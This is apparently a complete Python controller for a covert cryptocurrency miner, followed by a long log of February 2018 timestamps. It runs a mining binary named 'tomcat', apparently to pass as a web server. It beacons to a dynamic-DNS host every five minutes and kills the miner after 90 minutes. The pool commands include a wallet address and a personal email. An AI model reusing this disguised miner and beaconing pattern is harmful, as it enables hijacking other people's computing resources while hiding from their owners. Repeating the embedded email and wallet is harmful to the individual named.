import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:41:05.934048
#2018-02-17 16:29:07.435670
#2018-02-17 18:17:06.197751
#2018-02-17 20:04:04.404449
#2018-02-17 21:52:06.921970
#2018-02-17 23:37:05.678379
#2018-02-18 01:26:05.523279
#2018-02-18 03:14:01.772033
#2018-02-18 05:02:07.470194
#2018-02-18 06:54:07.631255
#2018-02-18 08:44:05.174978
#2018-02-18 10:31:07.456972
#2018-02-18 12:16:05.343608
#2018-02-18 14:03:06.760620
#2018-02-18 15:53:01.552164
#2018-02-18 17:43:06.040482
#2018-02-18 19:30:07.416335
#2018-02-18 21:15:04.240229
#2018-02-18 23:03:01.430961
#2018-02-19 00:50:08.199751
#2018-02-19 02:37:02.018799
#2018-02-19 04:23:02.119413
#2018-02-19 06:07:06.381931
#2018-02-19 07:54:06.973630
#2018-02-19 09:44:01.807761
#2018-02-19 11:35:06.668435
#2018-02-19 13:22:02.182624
#2018-02-19 15:10:05.944508
#2018-02-19 16:59:04.209941
#2018-02-19 18:46:05.671726
#2018-02-19 20:37:06.646700
#2018-02-19 22:25:06.102018
#2018-02-20 00:10:09.722621
#2018-02-20 01:56:01.747282
#2018-02-20 03:47:05.347062
#2018-02-20 05:32:07.349562
#2018-02-20 07:16:01.691649
#2018-02-20 09:02:01.615988
#2018-02-20 10:44:08.018908
#2018-02-20 12:31:07.989269
#2018-02-20 14:16:04.283303
#2018-02-20 15:59:14.243722
#2018-02-20 17:44:10.191168
#2018-02-20 19:37:02.180755
#2018-02-20 21:24:01.953550
#2018-02-20 23:09:01.330423
#2018-02-21 00:52:07.640040
#2018-02-21 02:38:07.083409
#2018-02-21 04:27:05.151505
#2018-02-21 06:15:06.738945
#2018-02-21 08:01:09.987930
#2018-02-21 09:46:03.679002
#2018-02-21 11:34:01.820310
#2018-02-21 13:23:06.642503
#2018-02-21 15:07:09.980854
#2018-02-21 16:56:08.651448
#2018-02-21 18:45:08.329790
#2018-02-21 20:32:08.569523
#2018-02-21 22:18:08.597621
#2018-02-22 00:07:06.011144
#2018-02-22 01:54:04.288253
#2018-02-22 03:41:05.209386
#2018-02-22 05:27:07.656145
#2018-02-22 07:12:06.847983
#2018-02-22 08:58:07.071245
#2018-02-22 10:46:08.418667
#2018-02-22 12:33:11.063582
#2018-02-22 14:18:05.876973
#2018-02-22 16:07:02.063405
#2018-02-22 17:52:10.427596
#2018-02-22 19:39:08.002076
#2018-02-22 21:30:09.705986
#2018-02-22 23:17:06.717814
#2018-02-23 01:04:04.891001
#2018-02-23 02:52:05.726474
#2018-02-23 04:40:02.005534
#2018-02-23 06:27:01.583754
#2018-02-23 08:15:08.143941
#2018-02-23 10:33:07.005259
#2018-02-23 12:24:09.042865
#2018-02-23 14:13:06.318422
#2018-02-23 16:03:04.219587
#2018-02-23 17:48:11.042224
#2018-02-23 19:35:04.970349
#2018-02-23 21:18:06.955778
#2018-02-23 23:06:04.019081
#2018-02-24 00:54:06.614656
#2018-02-24 02:49:06.348725
#2018-02-24 05:28:01.959989
#2018-02-24 07:15:08.032378
#2018-02-24 09:07:01.476211
#2018-02-24 10:41:07.214892
#2018-02-24 12:29:02.070571
#2018-02-24 14:20:09.459267
#2018-02-24 16:07:06.191410
#2018-02-24 17:58:03.707581
#2018-02-24 19:46:04.711205
#2018-02-24 21:31:07.648172
#2018-02-25 00:17:05.382335
#2018-02-25 04:14:06.983398
#2018-02-25 07:46:06.225881